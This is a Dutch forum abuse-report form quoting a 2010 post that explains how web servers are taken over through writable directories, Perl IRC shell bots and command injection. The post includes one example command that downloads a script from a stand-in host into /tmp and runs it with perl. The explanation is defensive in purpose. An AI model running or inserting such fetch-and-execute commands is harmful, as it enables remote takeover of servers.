Abuse Melding

Je hebt een klacht over de onderstaande posting:

25-11-2010, 16:49 door SirDice

Door backeroni: Daarnaast kunnen de bestandjes dus ook gesaved worden, dus hoe kan het dat de user waar dit allemaal onder draait (user apache bv) zo veel schrijf rechten heeft. Veel CMS software vereist schrijfrechten in diverse directories. En zelfs als dat niet het geval zou zijn kan er altijd nog in /tmp geschreven worden. Als laatste om de server over te nemen zullen de bestandjes ook nog eens uitgevoerd moeten worden, op de plek waar de bestandjes terecht komen heeft de desbetreffende user dus ook nog eens execute rechten. Afhankelijk waar deze bestanden terecht komen is het mogelijk om dat via een command injection te doen. Zowel "dude" als "half.txt" zijn IRC shell bots geschreven in perl. In tegenstelling tot wat de meeste zullen denken heeft de www gebruiker voldoende rechten om deze uit te voeren. Een manier die ik wel eens gezien heb is om, middels een command injection, het volgende uit te laten voeren: cd /tmp ; wget http://evil.example.com/badscript.txt ; perl badscript.txt Aan de OP, als ...

Beschrijf je klacht (Optioneel):

captcha